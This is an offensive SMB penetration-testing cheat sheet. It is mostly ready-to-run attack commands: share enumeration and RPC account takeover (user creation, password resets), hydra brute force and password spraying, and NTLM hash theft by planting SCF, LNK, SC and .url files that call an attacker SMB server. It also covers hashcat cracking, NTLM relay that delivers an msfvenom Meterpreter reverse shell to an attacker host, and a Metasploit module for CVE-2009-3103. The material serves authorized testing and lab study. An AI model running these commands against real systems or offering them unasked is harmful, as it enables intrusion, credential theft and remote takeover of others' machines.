139,445 - SMB

Usage

General

# Download all files without prompting
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *

# Mount a share (no authentication)
sudo mount -t cifs //10.10.10.10/target-share /mnt
sudo mount -t cifs - "username='',password=''" //10.10.10.10/my_share /mnt

# Mount a share (with authentication)
sudo mount -t cifs -o username=x7331,password=Pass123! //10.10.10.10/my_share /path/to/mount

Transfers

Launch SMB server on the attacking host:

impacket-smbserver -smb2support share . -username test -password tes

Connect from the target and transfer the file(s):

# Map the share
net use z: \\10.10.10.10\share /USER:test test

# Transfer the file(s)
copy my_file z:\

smbmap/smbclient

smbmap is a tool for quickly enumerating SMB shares and their permissions, revealing accessible directories and files to identify misconfigurations or sensitive data exposure.

# List shares and permissions
smbmap -H 10.10.10.10

# List share's contents
smbmap -H 10.10.10.10 -r my_share

# Spider the share
smbmap -u x7331 -p Passw0rd123! -H 10.10.10.10 -r my_share --depth 3

# Download a file
smbmap -H 10.10.10.10 --download "my_share\target_file"

# Upload a file
smbmap -H 10.10.10.10 --upload target_file "my_share\target_file"

smbclient is a command-line utility for interacting with SMB shares, allowing authentication, navigation, and file operations, making it useful for both enumeration and exploitation.

# List shares via a null session
smbclient -N -L //10.10.10.10

# Connect to a share
smbclient -U user //10.129.42.253/my_share
smbclient //target/my_share -U "domain\x7331%Password123\!"

rpc

Remote Procedure Call (RPC) is a protocol that enables communication and execution of functions on remote systems. It can be leveraged to enumerate services, query system information, and interact with administrative interfaces on Windows hosts, providing insight into target configurations and potential attack paths without requiring direct login.

# Connect via a null session
rpcclient -U "" -N 10.10.10.10

RPC can be used for enumeration tasks:

# System information
srvinfo

# Enumerate everything
netshareenumall

# Enumerate users
enumdomusers

# Enumerate the SID of a user
lookupnames user

# Enumerate user information
queryuser RID

# Enumerate groups
enumalsgroups

# Enumerate local groups
enumalsgroups builtin

# Enumerate domains
enumdomains

# Enumerate privileges
enumprivs

# Enumerate the password policy
getusrdompwinfo 1000

It can also be used for certain operations:

# Create a new user
createdomuser user1

# Set user's password
setuserinfo2 x7331 24 'Pass123!'

# Change a user's password
setuserinfo2 x7331 23 'ComplexP4ssw0rd!'
chgpasswd3 x7331 <old-password> <new-password>

# Create a new share
netshareadd "C:\Windows" "Windows" 10 "my_share"

smbcacls

# List directory permissions
smbcacls -N '//10.10.10.10/my_share' /my_directory

# # List directory permissions recursively
for i in $(ls); do echo $i; smbcacls -N '//10.10.10.103/my_share' /my_dir/$i ; done

Enumeration

Enumeration Scripts

enum4linux-ng is a Python rewrite of the original enum4linux.pl, designed to automate information gathering from Windows and Samba systems. It wraps around nmblookup, net, rpcclient, and smbclient to extract usernames, groups, shares, domain details, and password policies, providing structured output that accelerates Active Directory and SMB reconnaissance.

enum4linux-ng 172.16.10.3

impacket-samrdump uses the SAMR protocol to enumerate users, groups, and policy data from Windows or domain controllers. By leveraging Impacket, it exposes domain account structures without requiring administrative privileges, making it effective for mapping Active Directory environments and identifying potential escalation paths.

impacket-samrdump 172.16.10.3

Nmap

sudo nmap -sV -p 139,445 -script smb* 10.10.10.10

MSF

# Enumerate SMB's version
msf6 > use auxiliary/scanner/smb/smb_version

# Enumerate users
msf6 > use auxiliary/scanner/smb/smb_login

Attacks

Passwords

Brute Force

# BFA with wordlists
hydra -L <user-list> -P <pass-list> smb://<target-ip>

# BFA a target user
hydra -l <username> -P <pass-list> smb://<target-ip>

Password Spray

We can password spray with nxc:

# Domain
nxc smb 172.16.10.3 -u <user-list> -p Password123! --continue-on-success

# Local
nxc smb 172.16.10.3 -u <user-list> -p Password123! --continue-on-success --local-auth

hydra defaults on attacking the domain. To force local authentication we must prepend the local machine name (e.g. DC01) or .\ to the username in our userlist. For instance, DC01\Administrator or .\Administrator.

# Domain
hydra -U <user-wordlist> -p <pass> smb://<target-ip>

Nmap Vuln Scan

sudo nmap -script=smb-vuln\* -p445 <target-IP>

Hashes

All described methods (SCF, LNK, SC) require WRITE access to a share/directory:

• If WRITE access to a share is available, NetExec modules can be used for automation.

• If WRITE access is only available within a READABLE share, the process must be done manually.

For stealing the hash, the user must only browse the share, not interact with the file.

Share permissions can be configured to only allow folders to be created, not files; nxc will flag WRITE access in those cases.

SCF

Requires WRITE access to the Users share!

The Shell Command File (SCF) is a Windows file format used to define simple Explorer shell commands — kind of like shortcuts, but more primitive (read more here).

# Create the SCF file
nxc smb <target-ip> -u 'guest' -p '' -M scuffy -o NAME=README SERVER=<smb-server-ip>

Monitor the traffic (MSF's auxiliary/server/capture/smb can also be used):

sudo responder -I tun0

Clean up:

nxc smb <target-ip> -u 'guest' -p '' -M scuffy -o NAME=README SERVER=<smb-server-ip> CLEANUP=True

If a share is locally mounted and WRITE access is available for the SMB/Users/WritableDir folder, but not for the Users share, we can create an SCF file:

[Shell]
Command=2
IconFile=\\10.10.10.10\share\test.io
[Taskbar]
Command=ToggleDesktop

Listen:

sudo responder -I tun0

Transfer the SCF file to the writable directory:

sudo cp example.scf SMB/Users/WritableDir

LNK

A Link (LNK) file is a Windows shortcut file that points to another file, folder, or program. When opened, it tells Windows to launch the target it links to — but it can also include custom commands, making it useful for both legitimate use and malicious purposes like executing hidden payloads.

Upload a LNK file:

nxc smb <target-ip> -u <user> -p <pass> -M slinky -o SERVER=<smb-server-ip> NAME=README

Listen (MSF's auxiliary/server/capture/smb can also be used):

sudo responder -I tun0

Clean up:

nxc smb <target-ip> -u <user> -p <pass> -M slinky -o NAME=README CLEANUP=YES

SC

A Service Configuration (SC) file is a plain text file used to create or configure Windows services. It defines parameters like the service name, executable path, and startup settings. This is similar to the LNK method, but the URL needs to be escaped with \\ and by default it writes the file Documents in all writable shares.

Upload a SC file:

nxc smb <target-ip> -u <user> -p <pass> -M drop-sc -o URL=\\\\<smb-server-ip>\\<share_name> SHARE=<share_name> FILENAME=README

Listen (MSF's auxiliary/server/capture/smb can also be used):

sudo responder -I tun0

Clean up:

nxc smb <target-ip> -u <user> -p <pass> -M drop-sc -o CLEANUP=True FILENAME=README

URL

A .url file is a Windows Internet Shortcut linking to a web or network resource. It stores the target URL and optional metadata, including an IconFile for a custom icon. While not executable, it can reveal user activity, mapped paths, or be abused in phishing attacks by automatically opening the linked resource.

@hax.url

[InternetShortcut]
URL=anything
WorkingDirectory=anything
IconFile=\\192.168.45.241\%USERNAME%.icon
IconIndex=1

smb: \> put @hax.url 
putting file @hax.url as \@hax.url (1.2 kb/s) (average 1.2 kb/s)

When a user opens the .url file, the system attempts to load the specified icon. This triggers a network request to the host serving the icon, typically referencing the filename with the user’s account name. The request can also carry the NTLM hash of the account, exposing credentials during the retrieval process.

nltm_theft

ntml_theft is a tool that generates 21 different types of hash theft documents, e.g. .scf or .lnk files.

# Generate all possible files
ntlm_theft.py -g all -s <attacker-ip> -f test

# Listen
sudo responder -I tun0

# Upload the file into a writable share
nxc smb <target-ip> -u <user> -p <pass> --share <share-name> --put-file test/test.lnk test.lnk

Once a hash is obtained it can be cracked or relayed.

Crack

hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou

Relay

See below:NTLM Relay

NTLM Relay

Meterpreter

Relay for gaining RCE with a Meterpreter listener:

# Enumerate the target hosts
nxc smb 172.16.10.0/24 --gen-relay-list relay.txt

# Create a reverse shell payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker-ip> LPORT=<attacker-port> -f exe > shell.exe

# Start the SMB server
sudo impacket-ntlmrelayx -tf relay.txt -e ./shell.exe

# Start the listener
$ sudo msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST <attacker-ip>; set
LPORT 4444; exploit -j"

# Migrate
meterpreter > ps
meterpreter > migrate <PID>

MSF-Based

# Enumerate the target hosts
nxc smb 172.16.10.0/24 --gen-relay-list relay.txt

# Use the MSF module to relay
$ sudo msfconsole -q -x "use exploit/windows/smb/smb_relay; set RELAY_TARGETS 172.16.10.0/14; set SRVHOST <attacker-ip>; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST <attacker-ip>; exploit -j"

Impacket

# Enumerate the target hosts
nxc smb 172.16.10.0/24 --gen-relay-list relay.txt

# Relay via Impacket's script
sudo impacket-ntlmrelayx -tf relay.txt -smb2support --no-http

Vulnerabilities

SMBv2 Negotiation

Windows Vista (Gold, SP1, SP2), Windows Server 2008 (Gold, SP2), and Windows 7 Release Candidate are affected by a RCE vulnerability (CVE-2009-3103), aka SMBv2 Negotiation Vulnerability, in the SMBv2 protocol implementation within srv2.sys, the kernel-mode driver responsible for SMBv2 handling in certain Microsoft Windows versions. A flaw in the processing of the Process ID High header field in a NEGOTIATE PROTOCOL REQUEST packet allows an attacker to trigger an array index error by supplying an ampersand (&) character. This malformed input leads to an out-of-bounds memory dereference in kernel space.

When exploited, it can result in either a denial of service through a system crash (blue screen) or, under certain conditions, arbitrary code execution with kernel-level privileges. The attack is conducted over TCP port 445 and does not require authentication, making it highly dangerous when SMBv2 services are exposed to untrusted networks.

A MSF module exists for exploiting the vulnerability.

 msf > use exploit/windows/smb/ms09_050_smb2_negotiate_func_index